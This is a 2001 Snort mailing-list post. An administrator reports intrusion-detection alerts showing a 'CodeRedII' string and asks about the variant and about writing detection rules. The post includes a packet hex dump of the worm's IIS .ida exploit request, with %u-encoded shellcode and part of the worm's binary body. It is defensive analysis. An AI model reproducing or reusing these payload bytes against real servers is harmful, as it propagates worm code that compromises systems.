Snort mailing list archives
CodeRedII again?
From: Pontus Joakimsson <jpontus () ess nec de>
Date: Wed, 22 Aug 2001 14:35:52 +0200
Hi, Had an warez "attack" on our web/ftp server last two days (thinking of writing some rules for detecting it, can be interesting?), and noticed quite some Code Red alerts in the logs, the thing I reacted on was that it contained the string "CodeRedII"... Anyone knows about this variant? btw. does anyone knows if its possible to add more then one "detection-string" to a rule? Regards, Pontus Joakimsson ------------------------------------------------------------ [**] WEB-IIS ISAPI .ida attempt [**] 08/22-09:48:13.441655 210.111.15.79:1476 -> x.x.x.x 80 TCP TTL:104 TOS:0x0 ID:13484 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x3F4EE63E Ack: 0x15A91A99 Win: 0x4470 TcpLen: 20 ------------------------------------------------------------ 0x0000: 08 00 20 85 EF DF 00 C0 95 E0 F0 9B 08 00 45 00 .. ...........E. 0x0010: 05 DC 34 AC 40 00 68 06 A9 41 D2 6F 0F 4F C1 8D ..4.@.h..A.o.O.. 0x0020: 8B E2 05 C4 00 50 3F 4E E6 3E 15 A9 1A 99 50 10 .....P?N.>....P. 0x0030: 44 70 A3 58 00 00 47 45 54 20 2F 64 65 66 61 75 Dp.X..GET /defau 0x0040: 6C 74 2E 69 64 61 3F 58 58 58 58 58 58 58 58 58 lt.ida?XXXXXXXXX -- SNIP -- -- SNIP -- 0x0120: 58 58 58 58 58 58 58 25 75 39 30 39 30 25 75 36 XXXXXXX%u9090%u6 0x0130: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 858%ucbd3%u7801% 0x0140: 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 u9090%u6858%ucbd 0x0150: 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36 3%u7801%u9090%u6 0x0160: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 858%ucbd3%u7801% 0x0170: 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39 u9090%u9090%u819 0x0180: 30 25 75 30 30 63 33 25 75 30 30 30 33 25 75 38 0%u00c3%u0003%u8 0x0190: 62 30 30 25 75 35 33 31 62 25 75 35 33 66 66 25 b00%u531b%u53ff% 0x01A0: 75 30 30 37 38 25 75 30 30 30 30 25 75 30 30 3D u0078%u0000%u00= 0x01B0: 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E a HTTP/1.0..Con 0x01C0: 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F tent-type: text/ 0x01D0: 78 6D 6C 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 xml.Content-leng 0x01E0: 74 68 3A 20 33 33 37 39 20 0D 0A 0D 0A C8 C8 01 th: 3379 ....... 0x01F0: 00 60 E8 03 00 00 00 CC EB FE 64 67 FF 36 00 00 .`........dg.6.. 0x0200: 64 67 89 26 00 00 E8 DF 02 00 00 68 04 01 00 00 dg.&.......h.... 0x0210: 8D 85 5C FE FF FF 50 FF 55 9C 8D 85 5C FE FF FF ..\...P.U...\... 0x0220: 50 FF 55 98 8B 40 10 8B 08 89 8D 58 FE FF FF FF P.U..@.....X.... 0x0230: 55 E4 3D 04 04 00 00 0F 94 C1 3D 04 08 00 00 0F U.=.......=..... 0x0240: 94 C5 0A CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08 .........T....u. 0x0250: 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30 .~0...........F0 0x0260: 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 65 64 .........CodeRed 0x0270: 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38 II...$.U.f.....8 0x0280: FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A 00 8D .....P.......j.. 0x0290: 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B 45 08 .P...P..8...P.E. 0x02A0: FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF FF 01 .p.........8.... 0x02B0: 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE thS.U..U..E.i.T. 0x02C0: FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00 ..,.....,....... 0x02D0: 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF .......F4.E.Pj.. 0x02E0: 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00 u...........j.j. 0x02F0: FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69 .U.P.U.Ou..;...i 0x0300: BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26 05 57 .T....\&....\&.W 0x0310: FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB .U.j.j..U.j..U.. 0x0320: F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE ..F4)E.jd.U...<. 0x0330: FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D D2 07 ..P.U....<...=.. 0x0340: 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3 ..s....>......s. 0x0350: 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF FF FF f..p.....f..r... 0x0360: 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A .P.d.....t...j.j 0x0370: 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01 .j..U....t..E.j. 0x0380: 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D Th~f...u..U.Yj.. 0x0390: 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00 .p...P.u..U..... 0x03A0: 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00 00 75 ...tK3..U.=3'..u 0x03B0: 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C FF FF ?..h.........l.. 0x03C0: FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00 00 8B .......`........ 0x03D0: 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF 50 6A E...d.....h...Pj 0x03E0: 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55 A0 93 ...`...Pj.j..U.. 0x03F0: 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 83 j.Th~f...u..U.Y. 0x0400: FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00 00 6A ..u1.....X-....j 0x0410: 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D EA 0E .h....P.u..U.=.. 0x0420: 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF 50 FF ..u.j.j...\...P. 0x0430: 75 80 FF 55 A8 FF 75 80 FF 55 B4 E9 E7 FE FF FF u..U..u..U...... 0x0440: BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00 00 00 ....w........... 0x0450: 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00 8B 64 xu......`......d 0x0460: 24 08 64 67 8F 06 00 00 58 61 EB D9 64 67 FF 36 $.dg....Xa..dg.6 0x0470: 00 00 64 67 89 26 00 00 66 81 3B 4D 5A 75 E3 8B ..dg.&..f.;MZu.. 0x0480: 4B 3C 81 3C 0B 50 45 00 00 75 D7 8B 54 0B 78 03 K<.<.PE..u..T.x. 0x0490: D3 8B 42 0C 81 3C 03 4B 45 52 4E 75 C5 81 7C 03 ..B..<.KERNu..|. 0x04A0: 04 45 4C 33 32 75 BB 33 C9 49 8B 72 20 03 F3 FC .EL32u.3.I.r ... 0x04B0: 41 AD 81 3C 03 47 65 74 50 75 F5 81 7C 03 04 72 A..<.GetPu..|..r 0x04C0: 6F 63 41 75 EB 03 4A 10 49 D1 E1 03 4A 24 0F B7 ocAu..J.I...J$.. 0x04D0: 0C 0B C1 E1 02 03 4A 1C 8B 04 0B 03 C3 89 44 24 ......J.......D$ 0x04E0: 24 64 67 8F 06 00 00 58 61 C3 E8 51 FF FF FF 89 $dg....Xa..Q.... 0x04F0: 5D FC 89 45 F8 E8 0D 00 00 00 4C 6F 61 64 4C 69 ]..E......LoadLi 0x0500: 62 72 61 72 79 41 00 FF 75 FC FF 55 F8 89 45 F4 braryA..u..U..E. 0x0510: E8 0D 00 00 00 43 72 65 61 74 65 54 68 72 65 61 .....CreateThrea 0x0520: 64 00 FF 75 FC FF 55 F8 89 45 F0 E8 0D 00 00 00 d..u..U..E...... 0x0530: 47 65 74 54 69 63 6B 43 6F 75 6E 74 00 FF 75 FC GetTickCount..u. 0x0540: FF 55 F8 89 45 EC E8 06 00 00 00 53 6C 65 65 70 .U..E......Sleep 0x0550: 00 FF 75 FC FF 55 F8 89 45 E8 E8 17 00 00 00 47 ..u..U..E......G 0x0560: 65 74 53 79 73 74 65 6D 44 65 66 61 75 6C 74 4C etSystemDefaultL 0x0570: 61 6E 67 49 44 00 FF 75 FC FF 55 F8 89 45 E4 E8 angID..u..U..E.. 0x0580: 14 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 ....GetSystemDir 0x0590: 65 63 74 6F 72 79 41 00 FF 75 FC FF 55 F8 89 45 ectoryA..u..U..E 0x05A0: E0 E8 0A 00 00 00 43 6F 70 79 46 69 6C 65 41 00 ......CopyFileA. 0x05B0: FF 75 FC FF 55 F8 89 45 DC E8 10 00 00 00 47 6C .u..U..E......Gl 0x05C0: 6F 62 61 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75 obalFindAtomA..u 0x05D0: FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62 ..U..E......Glob 0x05E0: 61 6C 41 64 64 41 74 6F 6D 41 alAddAtomA -------------------------------------------------------- _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- CodeRedII again? Pontus Joakimsson (Aug 22)
- Re: CodeRedII again? Ryan Russell (Aug 22)
- Re: CodeRedII again? Skip Carter (Aug 22)